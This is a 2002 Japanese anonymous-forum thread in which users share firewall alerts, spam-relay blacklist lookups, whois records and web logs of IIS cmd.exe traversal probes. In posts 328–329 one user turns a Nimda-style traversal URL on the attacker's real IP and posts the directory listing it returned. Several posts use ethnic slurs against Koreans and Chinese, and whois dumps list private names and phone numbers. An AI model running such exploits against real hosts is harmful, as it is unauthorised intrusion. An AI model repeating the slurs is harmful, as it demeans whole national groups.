remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20020722
source: KRNIC

275 :名無しさん@お腹いっぱい。:02/07/25 16:10
>>273
あんさん、まめでんな。

276 :不正中継ホストとして登録されています:02/07/26 02:46
http://www.ordb.org/lookup/?host=arvis.ac.mn
このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: arvis.ac.mn (202.131.2.195)
Look up this host in non-ORDB RBL's (May take a while to load)
ORDB.org への初回登録日時: 2002-05-24 12:22 GMT
初回送信ホスト: 207.15.208.88
最終検査日時: 2002-07-20 05:00 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@groundzero.ordb.org
Received: from arvis.ac.mn (unknown [202.131.2.195])
by groundzero.ordb.org (Postfix) with ESMTP id 2DFEC5B107
for ; Sat, 20 Jul 2002 05:00:17 +0000 (GMT)
Received: from groundzero.ordb.org (groundzero.ordb.org [62.242.0.190])
by arvis.ac.mn (8.8.8/8.8.7) with ESMTP id OAA11072
for ; Sat, 20 Jul 2002 14:12:33 +0900
Date: Sat, 20 Jul 2002 14:12:33 +0900
Message-Id: < 200207200512.OAA11072@arvis.ac.mn >
From: spamtest@arvis.ac.mn
To: marvin%marvin.ordb.org@arvis.ac.mn
X-ORDB-Envelope-From: spamtest@arvis.ac.mn
X-ORDB-Envelope-To: marvin%marvin.ordb.org@arvis.ac.mn
Subject: ORDB.org check (0.2064028643884580.7485580137) ip=202.131.2.195

277 :あぼーん:あぼーん
あぼーん

278 :ホストの検索 - その他の RBL への登録状況:02/07/26 11:14
http://www.ordb.org/lookup/rbls/?host=thriftytales.com
ホストの検索 - その他の RBL への登録状況
ORDB.org は独立の組織であり、下記の RBL とは一切の提携を行っておりません。
個々のブラックリストに関する情報と登録情報を削除するための手続きは、
それぞれの RBL が提供する情報をご覧ください。
Host: thriftytales.com (66.228.199.47)
relays.osirusoft.com 登録あり: 47.199.228.66.relays.osirusoft.com descriptive text
"[1] Network Commerce/ombramarketing, see http://spews.org/ask.cgi?S590"

spews.relays.osirusoft.com 登録あり: 47.199.228.66.spews.relays.osirusoft.com
descriptive text "[1] Network Commerce/ombramarketing, see http://spews.org/ask.cgi?S590"

279 :ただいまORDBが調査中!!!!!!:02/07/26 11:17
http://www.ordb.org/lookup/?host=thriftytales.com
右記ホストの登録状態: thriftytales.com (66.228.199.47)
最終の検査依頼ホスト: 63.205.39.98
検査待ちリストへの最終登録日時: 2002-07-26 01:50 GMT
This submission has been confirmed
This host is currently being tested

280 :  :02/07/26 18:59
99%韓国!クラックなんか仕掛けていったい何がうれしいのかさっぱりわからない。

281 :名無しさん@お腹いっぱい。:02/07/26 22:08
大学ドメイン、ハクられまくってるよ…(;_;)

ttp://kymwwwsv.akjim.yamanashi.ac.jp
ttp://www.gbf.off.geidai.ac.jp
ttp://www.fine.lett.hiroshima-u.ac.jp
ttp://www.dousoukai.pharm.tohoku.ac.jp
ttp://www.ryugaku.kyoto-u.ac.jp
ttp://www.hs.bunsei.ac.jp
ttp://www.junshin.ac.jp
ttp://bunsyo.hiroshima-cmt.ac.jp
ttp://www.sao.saga-u.ac.jp
ttp://www.phys.ed.gifu-u.ac.jp
ttp://www.prod.ie.musashi-tech.ac.jp


282 :チョソは命で謝罪しる:02/07/27 12:25
inetnum: 211.49.142.0 - 211.49.142.255
netname: INTADVENTURE-KR
descr: Internet Adventure
descr: 494-5 Kwango-Dong Nam-Gu
descr: INCHON
descr: 402-080
country: KR
admin-c: JS1021-KR
tech-c: JS1022-KR
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20020722
source: KRNIC

person: Junseung Shin
country: KR
phone: 02-409-0930
fax-no: 02-409-0930
e-mail: gaia-advengure@hanmail.net
nic-hdl: JS1021-KR
changed: hostmaster@nic.or.kr 20020722
source: KRNIC
 

283 :第三者中継調査 :02/07/28 00:36
http://www.nanet.co.jp/rlytest/relaytest.html
第三者中継調査 結果表示
smtp.yukaido.ne.jp
<220 smtp.yukaido.ne.jp ESMTP
>HELO rlytest.nanet.co.jp
<250 smtp.yukaido.ne.jp
>MAIL FROM:< TESThttp://www.nanet.co.jp/rlytest/requestedfrom[218.41.73.60]@smtp.yukaido.ne.jp >
<250 ok
>RCPT TO:<rlytest@nanet.co.jp>
<250 ok
>QUIT
<221 smtp.yukaido.ne.jp
問題あり:不正な中継を受け付けます。
(210.230.82.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

284 :名無しさん@お腹いっぱい。:02/07/28 02:42
どこの何者やら特定できない?なんて何なんだ?!

24.129.80.49   
inetnum: 0.0.0.0 - 255.255.255.255
netname: IANA-BLK
descr: The whole IPv4 address space
country: NL
admin-c: IANA1-RIPE
tech-c: IANA1-RIPE
status: ALLOCATED UNSPECIFIED
remarks: The country is really worldwide.
remarks: This address space is assigned at various other places in
remarks: the world and might therefore not be in the RIPE database.
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: RIPE-NCC-HM-MNT
mnt-routes: RIPE-NCC-NONE-MNT
changed: bitbucket@ripe.net 20010529
changed: bitbucket@ripe.net 20020625
source: RIPE

role: Internet Assigned Numbers Authority
address: see http://www.iana.org.
e-mail: bitbucket@ripe.net
admin-c: IANA1-RIPE
tech-c: IANA1-RIPE
nic-hdl: IANA1-RIPE
remarks: For more information on IANA services
remarks: go to IANA web site at http://www.iana.org.
mnt-by: RIPE-NCC-MNT
changed: bitbucket@ripe.net 20010411
source: RIPE

285 :名無しさん@お腹いっぱい。:02/07/28 03:31
コイツしつこい

アドレス 211.190.212.150 からの不正侵入の試みを規則 Backdoor/SubSeven トロイの木馬のデフォルト遮断 によって検出しました。

286 :名無しさん@お腹いっぱい。:02/07/28 04:52
アドレス 61.38.89.47 からの不正侵入の試みを規則 Backdoor/SubSeven トロイの木馬のデフォルト遮断 によって検出しました。


287 :名無しさん@お腹いっぱい。:02/07/28 10:01
12.225.107.163

288 :名無しさん@お腹いっぱい。:02/07/28 17:15
しつこい


289 :名無しさん@お腹いっぱい。:02/07/28 23:38
ポーランドから来た。
157.25.119.22

290 :ツパッリハイスクール:02/07/29 00:18
結構前から赤いCDが出回っている。
IPとやら偽装して送れるソフトだそうだ
IPアドレス信用できねーよなまったく
模倣犯だよ

291 :ホストの検索 - その他の RBL への登録状況:02/07/29 00:44
http://www.ordb.org/lookup/rbls/?host=mail.infosafe.net.cn
ホストの検索 - その他の RBL への登録状況
ORDB.org は独立の組織であり、下記の RBL とは一切の提携を行っておりません。
個々のブラックリストに関する情報と登録情報を削除するための手続きは、
それぞれの RBL が提供する情報をご覧ください。
Host: mail.infosafe.net.cn (61.172.249.30)
relays.osirusoft.com 登録あり: 30.249.172.61.relays.osirusoft.com descriptive text
"This entry was last confirmed open on 4/11/2002"

spews.relays.osirusoft.com 登録あり: 30.249.172.61.spews.relays.osirusoft.com
descriptive text "[1] CyberTech, see http://spews.org/ask.cgi?S406"

bl.spamcop.net 登録あり: 30.249.172.61.bl.spamcop.net descriptive text
"Blocked - see http://spamcop.net/bl.shtml?61.172.249.30"

block.blars.org 登録あり:
ipwhois.rfc-ignorant.org 登録あり: 30.249.172.61.ipwhois.rfc-ignorant.org
descriptive text "Inaccurate or missing WHOIS data"

sbl.spamhaus.org 登録あり: 30.249.172.61.sbl.spamhaus.org descriptive text
"Listed on SBL - see http://spamhaus.org/SBL/sbl.lasso?query=SBX2858"

dnsbl.njabl.org 登録あり: 30.249.172.61.dnsbl.njabl.org descriptive text
"relay tested -- 1016748005"

292 :名無しさん:02/07/29 01:46
61.126.162.106
218.224.46.230

チョンの仕業か?
80と113ポートつついてくるんだがウザイ

293 :名無しさん@お腹いっぱい。:02/07/30 05:00
inetnum: 211.168.59.64 - 211.168.59.127
netname: CCY-B-KR
descr: CYBER STOCK
descr: 605 SAENGYEN3-DONG DONGDUCHUN
descr: KYONGGI
descr: 483-033
country: KR
admin-c: YM140-KR
tech-c: YM141-KR
remarks: This IP address space has been allocated to KRNIC.
remarks: For more information, using KRNIC Whois Database
remarks: whois -h whois.nic.or.kr
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20020722
source: KRNIC

person: YOUNGHYUN MIN
country: KR
phone: +82-11-740-3159
e-mail: kgromc@soback.kornet.net
nic-hdl: YM140-KR
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20020722
source: KRNIC


294 :不正中継ホストとして登録されています:02/07/30 10:39
http://www.ordb.org/lookup/?host=mail.netsol.net
このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: mail.netsol.net (216.179.148.10)
Look up this host in non-ORDB RBL's (May take a while to load)
ORDB.org への初回登録日時: 2002-07-05 11:25 GMT
初回送信ホスト: 64.81.100.235
最終検査日時: 2002-07-05 11:25 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@bockscar.ordb.org
Received: from mail.netsol.net (mail.netsol.net [216.179.148.10])
by BocksCar.ORDB.org (Postfix) with ESMTP id B78EA5B8E
for ; Fri, 5 Jul 2002 13:25:41 +0200 (CEST)
Received: from localhost.localdomain ([212.242.88.3]) by mail.netsol.net
(Post.Office MTA v3.5.3 release 223 ID# 0-12345L500S10000V35)
with ESMTP id net for ;
Fri, 5 Jul 2002 04:35:42 -0700
From: spamtest@netsol.net
To: marvin@marvin.ordb.org
X-ORDB-Envelope-From: spamtest@netsol.net
X-ORDB-Envelope-To: marvin@marvin.ordb.org
Subject: ORDB.org check (0.7480656845888090.5116510414) ip=216.179.148.10
Message-Id: <20020705112541.B78EA5B8E@BocksCar.ORDB.org>
Date: Fri, 5 Jul 2002 13:25:41 +0200 (CEST)

295 :ホストの検索 - その他の RBL への登録状況:02/07/30 18:57
http://www.ordb.org/lookup/rbls/?host=suns.entangledweb.net
ホストの検索 - その他の RBL への登録状況
ORDB.org は独立の組織であり、下記の RBL とは一切の提携を行っておりません。
個々のブラックリストに関する情報と登録情報を削除するための手続きは、
それぞれの RBL が提供する情報をご覧ください。
Host: suns.entangledweb.net (216.15.238.66) rams.entangledweb.net (216.15.159.226)
bl.spamcop.net 登録あり: 66.238.15.216.bl.spamcop.net descriptive text
"Blocked - see http://spamcop.net/bl.shtml?216.15.238.66"

http://uptime.netcraft.com/up/graph?site=suns.entangledweb.net&submit=Examine
http://uptime.netcraft.com/up/graph?mode_u=on&mode_w=on&site=www.ultrapasswords.com&submit=Examine
OS, Web Server and Hosting History for suns.entangledweb.net
OS Server Last changed IP address Netblock Owner
Linux Apache/1.3.20 (Unix) PHP/4.0.6 30-Jul-2002 216.15.238.66 ESM International
http://spamcop.net/w3m?action=checkblock&ip=216.15.238.66

296 :あげ:02/07/31 02:26
age

297 :ホストの検索 - その他の RBL への登録状況:02/07/31 10:55
http://www.ordb.org/lookup/?host=host.optinllc.com
http://www.ordb.org/lookup/rbls/?host=host.optinllc.com
ホストの検索 - その他の RBL への登録状況
ORDB.org は独立の組織であり、下記の RBL とは一切の提携を行っておりません。
個々のブラックリストに関する情報と登録情報を削除するための手続きは、
それぞれの RBL が提供する情報をご覧ください。
Host: host.optinllc.com (64.251.23.133)
relays.osirusoft.com 登録あり: 133.23.251.64.relays.osirusoft.com
descriptive text "[1] Infolink, see http://spews.org/ask.cgi?S1504"

spews.relays.osirusoft.com 登録あり: 133.23.251.64.spews.relays.osirusoft.com
descriptive text "[1] Infolink, see http://spews.org/ask.cgi?S1504"

bl.spamcop.net 登録あり: 133.23.251.64.bl.spamcop.net descriptive text
"Blocked - see http://spamcop.net/bl.shtml?64.251.23.133"

blackholes.wirehub.net 登録あり: 133.23.251.64.blackholes.wirehub.net is a nickname
for blocked.perm.blackholes.wirehub.net blocked.perm.blackholes.wirehub.net
descriptive text "Blacklisted permanently by Wirehub! Internet DNSBL - http://doema.wirehub.nl/error/errors.html#blackholes - http://basic.wirehub.nl/permblockIP.txt"

ipwhois.rfc-ignorant.org 登録あり: 133.23.251.64.ipwhois.rfc-ignorant.org
descriptive text "Inaccurate or missing WHOIS data"

ztl.dorkslayers.com 登録あり: 133.23.251.64.ztl.dorkslayers.com is a nickname
for meat.ztl.dorkslayers.com meat.ztl.dorkslayers.com descriptive text
"Network provider of NETBLK-INMM-64-251-7-128"

dnsbl.njabl.org 登録あり: 133.23.251.64.dnsbl.njabl.org descriptive text
"spam source -- 1027473547"

298 :通報しますた:02/07/31 19:05
OC●の香具師がしつこいので
プロバイダーに連絡しますた
厳重注意してくれるってさ

暇な時はセコセコabuseやめれメールでも
出そうかな。

299 :298:02/07/31 19:06
スレ違いだった、すまそ

300 :名無しさん@お腹いっぱい。:02/08/01 01:27
2002/7/31 13:36:17 不正試行 4回 トロイの木馬
あなたが検索されたIPアドレス[ 218.156.106.207 ]の企業名・団体名は以下の通りです。
inetnum: 218.144.0.0 - 218.159.255.255
netname: KORNET
descr: KOREA TELECOM
descr: Network Management Center
country: KR
admin-c: DL248-AP
tech-c: GK40-AP
remarks: ******************************************
remarks: Allocated to KRNIC Member.
remarks: If you would like to find assignment
remarks: information in detail please refer to
remarks: the KRNIC Whois Database at:
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: MNT-KRNIC-AP
mnt-lower: MNT-KRNIC-AP
changed: hostmaster@apnic.net 20010924
source: APNIC

301 :名無しさん@お腹いっぱい。:02/08/01 01:28
person: Host Master
address: 11F, KTF B/D, 1321-11, Seocho2-Dong, Seocho-Gu,
address: Seoul, Korea, 137-857
country: KR
phone: +82-2-2186-4500
fax-no: +82-2-2186-4496
e-mail: hostmaster@nic.or.kr
nic-hdl: HM127-AP
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20020507
source: APNIC


302 :名無しさん@お腹いっぱい。:02/08/01 01:29
inetnum: 61.40.165.128 - 61.40.165.191
netname: NETCLUB4017317D
descr: Netclub Network Cent
descr: PC Game Plaza User in
descr: Dongchun-dong Yeonsu-gu INCHON
country: KR
admin-c: KP104-AP
tech-c: DB50-AP
notify: b4017317@users.bora.net
mnt-by: MAINT-KR-DACOM
changed: b4017317@users.bora.net 20020417
source: APNIC

role: DACOM BORANET
address: DACOM Bldg., 706-1, Yoeksam-dong, Kangnam-ku, Seoul
phone: +82-2-6220-7755
fax-no: +82-2-6220-0706
e-mail: ipadm@nic.bora.net
admin-c: TH45-AP
tech-c: EJL1-AP
nic-hdl: DB50-AP
remarks: IP address administrator group of NIC team, DACOM Corp.
notify: ipadm@nic.bora.net
mnt-by: MAINT-KR-DACOM
changed: ipadm@nic.bora.net 20011009
source: APNIC

303 :名無しさん@お腹いっぱい。:02/08/01 01:31
inetnum: 211.168.0.0 - 211.171.255.255
netname: KRNIC-KR
descr: KRNIC
descr: Korea Network Information Center
country: KR
admin-c: HM127-AP
tech-c: HM127-AP
remarks: ******************************************
remarks: KRNIC is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the KRNIC Whois DB
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: APNIC-HM
mnt-lower: MNT-KRNIC-AP
changed: hostmaster@apnic.net 20000526
changed: hostmaster@apnic.net 20010606
source: APNIC

person: Host Master
address: 11F, KTF B/D, 1321-11, Seocho2-Dong, Seocho-Gu,
address: Seoul, Korea, 137-857
country: KR
phone: +82-2-2186-4500
fax-no: +82-2-2186-4496
e-mail: hostmaster@nic.or.kr
nic-hdl: HM127-AP
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20020507
source: APNIC

304 :スパムより判明  登録あり:02/08/01 01:54
http://www.ordb.org/lookup/?host=210.104.107.5
このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: 210.104.107.5 (210.104.107.5)
Look up this host in non-ORDB RBL's (May take a while to load)
ORDB.org への初回登録日時: 2002-07-14 11:23 GMT
初回送信ホスト: 64.81.100.235
最終検査日時: 2002-07-25 23:34 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@groundzero.ordb.org
Received: from mail (unknown [210.104.107.5])
by groundzero.ordb.org (Postfix) with ESMTP id 55AAC5B141
for ; Thu, 25 Jul 2002 23:34:31 +0000 (GMT)
Received: from localhost.localdomain (ns.fgnet.dk [212.242.88.2])
by mail (2.0 Build 2119 (Berkeley 8.8.4)/8.8.4) with ESMTP
id IAA16333 for ; Fri, 26 Jul 2002 08:30:47 -0700
Date: Fri, 26 Jul 2002 08:30:47 -0700
From: bitbucket@ordb.org
Message-Id: <200207261530.IAA16333@mail>
To: marvin@marvin.ordb.org
X-ORDB-Envelope-From: bitbucket@ordb.org
X-ORDB-Envelope-To: marvin@marvin.ordb.org
Subject: ORDB.org check (0.07359620385166470.775669581) ip=210.104.107.5

305 :名無しさん@お腹いっぱい。:02/08/01 11:18
トロイにポトスキャ・・・のKr

[ 218.156.106.207 ]
[ 211.59.2.82 ]
[ 61.40.165.164 ]
[ 211.171.216.28 ]

かなりうざい。



306 :名無しさん@お腹いっぱい。:02/08/01 11:35
>>305
オマエのほうがよほどうざい。

307 : :02/08/01 18:28
>>306
カエレ!

308 :名無しさん@お腹いっぱい。:02/08/02 11:15
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 202.233.192.0-202.233.255.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [運用責任者] KH071JP
n. [技術連絡担当者] AI018JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns2.hyper.web.ad.jp
y. [通知アドレス] jpnic-sec@web.ad.jp
[割当年月日] 2000/05/11
[最終更新] 2001/01/23 16:51:10 (JST)
saitoh@web.ad.jp


309 :名無しさん@お腹いっぱい。:02/08/03 04:56
後進国(中、韓)やドキュソの多い国(米)は、創造性に欠けるか、
やることがないから、バカなことに手を出すのだよ。
小人閑居して不善をなす。

310 :pacbell:02/08/03 19:12
http://spamcop.net/w3m?action=checkblock&ip=63.205.11.80
mta7.pltn13.pbi.net
pbi.net
sbcsmtp3.sbc.com (pri=20)
<220 sbcsmtp3.sbc.com ESMTP Sendmail 8.12.5/8.12.5; **
>HELO rlytest.nanet.co.jp
<250 sbcsmtp3.sbc.com Hello ns.nanet.co.jp [210.164.52.3], pleased to meet you
>MAIL FROM:< TESThttp://www.nanet.co.jp/rlytest/requestedfrom[63.205.11.80]@sbcsmtp3.sbc.com >
<553 5.1.4< TESThttp://www.nanet.co.jp/rlytest/requestedfrom[64.164.98.8]@sbcsmtp3.sbc.com >... Forged sender address
正常:中継は拒否されました。
http://www.ordb.org/lookup/rbls/?host=mta7.pltn13.pbi.net
ホストの検索 - その他の RBL への登録状況
Host: mta7.pltn13.pbi.net (64.164.98.8)
ztl.dorkslayers.com 登録あり: 8.98.164.64.ztl.dorkslayers.com descriptive text "64.164.98.8 is listed by ztl.dorkslayers.com"

311 :名無しさん@お腹いっぱい。:02/08/03 21:44
あなたが検索されたIPアドレス[ 211.203.91.19 ]の企業名・団体名は以下の通りです。
inetnum: 211.200.0.0 - 211.205.255.255
netname: HANANET
descr: Hanaro Telecom, Inc.
country: KR
admin-c: IS37-AP
tech-c: SH243-AP
mnt-by: MNT-KRNIC-AP
mnt-lower: MNT-KRNIC-AP
changed: hostmaster@apnic.net 20000822
changed: hostmaster@apnic.net 20010627
source: APNIC

person: Inyup Sung
address: Hanaro Telecom Co.
address: Kukje Electornics Cneter Bldg. 1445-3 Seocho-Dong Seocho-Ku
address: SEOUL
address: 137-070
country: KR
phone: +82-2-106
fax-no: +82-2-6266-6483
e-mail: info@hananet.net
nic-hdl: IS37-AP
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20010523
source: APNIC

312 :名無しさん@お腹いっぱい。:02/08/03 21:45
inetnum: 211.203.91.0 - 211.203.91.255
netname: HANANET-PUSAN-KR
descr: HANARO Telecom
descr: 1445-3 Seocho-Dong Seocho-Ku
descr: SEOUL
descr: 137-728
country: KR
admin-c: IS3626-KR
tech-c: SH4958-KR
remarks: This IP address space has been allocated to KRNIC.
remarks: For more information, using KRNIC Whois Database
remarks: whois -h whois.nic.or.kr
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20020722
source: KRNIC

person: Inyup Sung
country: KR
phone: +82-2-106
fax-no: +82-2-6266-6483
e-mail: info@hananet.net
nic-hdl: IS3626-KR
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20020722
source: KRNIC

313 :ms-sql-s をブロックしました:02/08/03 23:41
ms-sql-s をブロックしました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは 130.94.247.44,ms-sql-s
リモートアドレス、 サービスは 211.20.168.125,3594
プロセス名は N/A

ftp をブロックしました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは 63.205.11.80,ftp
リモートアドレス、 サービスは 62.32.59.243,12345
プロセス名は N/A
inetnum: 62.32.58.0 - 62.32.59.255
netname: gis-net-ir
descr: Global Internet & Software int
descr: Providing high quality Internet Services in Iran
country: IR イラン???

314 :不正中継ホストとして登録されています:02/08/04 12:14
http://www.ordb.org/lookup/?host=202.103.64.43
http://www.ordb.org/lookup/rbls/?host=202.103.64.43
このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: 202.103.64.43 (202.103.64.43)
Look up this host in non-ORDB RBL's (May take a while to load)
ORDB.org への初回登録日時: 2002-05-28 11:54 GMT
初回送信ホスト: 194.131.210.120
最終検査日時: 2002-07-29 19:38 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@bockscar.ordb.org
Received: from localhost.localdomain (unknown [202.103.64.43])
by BocksCar.ORDB.org (Postfix) with ESMTP id 516245C29
for ; Mon, 29 Jul 2002 19:37:22 +0000 (GMT)
Received: from localhost.localdomain (sundance.nowhere.dk [194.19.197.251])
by localhost.localdomain (8.11.2/8.11.2) with SMTP id g6U7dK013543
for ; Tue, 30 Jul 2002 03:39:24 -0400
Date: Tue, 30 Jul 2002 03:39:24 -0400
Message-Id: <200207300739.g6U7dK013543@localhost.localdomain>
From: spamtest@[202.103.64.43]
To: marvin@marvin.ordb.org
X-ORDB-Envelope-From: spamtest@[202.103.64.43]
X-ORDB-Envelope-To: marvin.ordb.org!marvin
Subject: ORDB.org check (0.4450474666400130.8321805655) ip=202.103.64.43

315 : :02/08/04 12:18
http://www.nanet.co.jp/rlytest/relaytest.html
202.103.64.43
<220 ******************************************2******2*************2002*0***0**0 *0*00
>HELO rlytest.nanet.co.jp
<250 localhost.localdomain Hello ns.nanet.co.jp [210.164.52.3], pleased to meet you
>MAIL FROM:< TESThttp://www.nanet.co.jp/rlytest/requestedfrom[200.171.9.95]@[202.103.64.43] >
<452 4.4.5 Insufficient disk space; try again later
正常:中継は拒否されました。

316 :  :02/08/04 17:41
日本人ハカーの質や人数は欧米、中、韓、盗難アジアにくらべて
上ですか下ですか

317 :名無しさん@お腹いっぱい。:02/08/04 18:54
>>125
あの・・・。遅レスなんですけどそのIPは俺・・・。
しかも今はじめてクラックとか知ってNorton先生つっこみますた。
どういうこと??
つまり

127 名前:cheshire-cat[sage] 投稿日:02/03/09 14:05
あ、個人ならルーターの設定不良だろうけど。
お役所とか企業ならアリかもしれない。

↑ですか。
ルータ設定見直しますスマセン

318 :cheshire-cat ◆CATJR.v6 :02/08/04 19:06
>>317
「個人相手にSmarf Dosする理由はまず無いだろう」「しかもそゆIPアドレスで。。。。」っていうつもりで、書いたような記憶がありまする。

319 :名無しさん@お腹いっぱい。:02/08/04 19:17
>>318
スマセン。よくみたら「クラスCの推奨プライベートIPアドレス」とかなんとか。
どうやら俺だけじゃなくて複数人が迷惑かけてるみたいで。
今から「クラスCの推奨プライベートIPアドレス」検索かけて設定直してきます。


320 :>>319:02/08/04 19:23
クラスCとは?(やや難)
クラスCのアドレスは、最初が110(2進)で、10進ドット表記では、
192.0.0.0から223.255.255.255までで、
続く21ビットを含めて24ビット部分をネットワーク部、
最後の8ビットはホスト部と呼び組織内で自由に利用でき、
256個(一部ホストには割り当てない)の番号が使える。

つまり、この範囲のアドレスから来たら
全部初心者の設定ミスだから蹴っちゃっていいってことでいいんですかね。
スレがそこはかとなく違うんで放置してください。

321 :名無しさん@お腹いっぱい。:02/08/05 00:51
61.99.54.162  Seoul,Korea(THRUNET)
212.211.82.37  Frankfurt,Germany
64.4.12.30  MountainView,CA,US
61.188.205.131  Beijing,China(CHINANET)
206.111.91.126  LosAngeles,CA,US

322 :名無しさん@お腹いっぱい。:02/08/05 00:54
>>284
マサチューセッツの人です。

323 :名無しさん@お腹いっぱい。:02/08/05 01:29
telnet://fuck-japan.com/
telnet://antyjapan.wo.ro/

とりあえずナンチョンは馬鹿が多い。
誰か開けて(藁

324 :名無しさん@お腹いっぱい。:02/08/05 12:01
>>317-320
今時クラスCなんて言わねぇぞw
CIDRが始まったのいつからだと思ってんだ?


325 :名無しさん@お腹いっぱい。:02/08/05 13:39
The firewall has blocked internet access to your computer
[TCP Port 3017] from 64.4.13.216 [TCP Port 1863] [TCP flags: S].


64.4.13.216

MS Hotmail (NETBLK-HOTMAIL)
1065 La Avenida
Mountain View, CA 94043
US

Netname: HOTMAIL
Netblock: 64.4.0.0 - 64.4.63.255

Coordinator:
Myers, Michael (MM520-ARIN) icon@HOTMAIL.COM
650-693-7072

Domain System inverse mapping provided by:

NS1.HOTMAIL.COM216.200.206.140
NS3.HOTMAIL.COM209.185.130.68
NS2.HOTMAIL.COM216.200.206.139
NS4.HOTMAIL.COM64.4.29.24

Record last updated on 15-Jul-2002.
Database last updated on 4-Aug-2002 20:00:00 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

326 :初めてサイト開きましたが来るのはハッカーばっかし!:02/08/05 19:54
こいつが特にうざいんですけど韓国ですね、どこに連絡したらいいんでしょうか。

[Mon Aug 5 13:59:30 2002] [error] [client 210.122.121.246] File does not exist: /home/scripts/root.exe
[Mon Aug 5 13:59:31 2002] [error] [client 210.122.121.246] File does not exist: /home/MSADC/root.exe
[Mon Aug 5 13:59:32 2002] [error] [client 210.122.121.246] File does not exist: /home/c/winnt/system32/cmd.exe
[Mon Aug 5 13:59:33 2002] [error] [client 210.122.121.246] File does not exist: /home/d/winnt/system32/cmd.exe
[Mon Aug 5 13:59:33 2002] [error] [client 210.122.121.246] File does not exist: /home/scripts/..%5c../winnt/system32/cmd.exe
[Mon Aug 5 13:59:34 2002] [error] [client 210.122.121.246] File does not exist: /home/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Mon Aug 5 13:59:35 2002] [error] [client 210.122.121.246] File does not exist: /home/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Mon Aug 5 13:59:36 2002] [error] [client 210.122.121.246] File does not exist: /home/msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe
[Mon Aug 5 13:59:36 2002] [error] [client 210.122.121.246] File does not exist: /home/scripts/..../winnt/system32/cmd.exe
[Mon Aug 5 13:59:38 2002] [error] [client 210.122.121.246] File does not exist: /home/scripts/..政../winnt/system32/cmd.exe
[Mon Aug 5 13:59:39 2002] [error] [client 210.122.121.246] File does not exist: /home/scripts/..../winnt/system32/cmd.exe
[Mon Aug 5 13:59:41 2002] [error] [client 210.122.121.246] File does not exist: /home/scripts/..%5c../winnt/system32/cmd.exe
[Mon Aug 5 13:59:42 2002] [error] [client 210.122.121.246] File does not exist: /home/scripts/..%2f../winnt/system32/cmd.exe

327 :名無しさん@お腹いっぱい。:02/08/05 23:18
>>8
ワロタ

328 :Nimda:02/08/06 10:56
>>326
http://210.122.121.246/scripts/..%252f../winnt/system32/cmd.exe?/c+dir

329 :328:02/08/06 10:57
Directory of c:\inetpub\scripts

2002-08-06 10:53a <DIR> .
2002-08-06 10:53a <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 8,131,727,360 bytes free


330 :名無しさん@お腹いっぱい。:02/08/08 13:56
OCNのファイアーウォールサービス使ったら
南チョンからのウザいノックが無くなったw

331 :データベースの検索結果:02/08/08 23:14
http://www.nanet.co.jp/rlytest/relaytest.html
第三者中継調査(Third Party Relay) - 結果表示
208.198.157.136
接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。
http://www.ordb.org/lookup/?host=208.198.157.136
このホストは ORDB.org に不正中継ホストとして登録されていません。
データベースの検索結果: 208.198.157.136 (208.198.157.136)
Look up this host in non-ORDB RBL's (May take a while to load)
ホスト 208.198.157.136 は ORDB.org のデータベースに登録されていません。
右記ホストの登録状態: 208.198.157.136 (208.198.157.136)
最終の検査依頼ホスト: 194.109.6.98
検査待ちリストへの最終登録日時: 2002-07-24 02:25 GMT
This submission has not yet been confirmed

332 :outblaze.comがspammer:02/08/08 23:15
mail.com http://www.nanet.co.jp/rlytest/relaytest.html
mail-com.mr.outblaze.com (pri=10)
<220 spf6.us4.outblaze.com ESMTP Sendmail 8.11.6/8.11.6
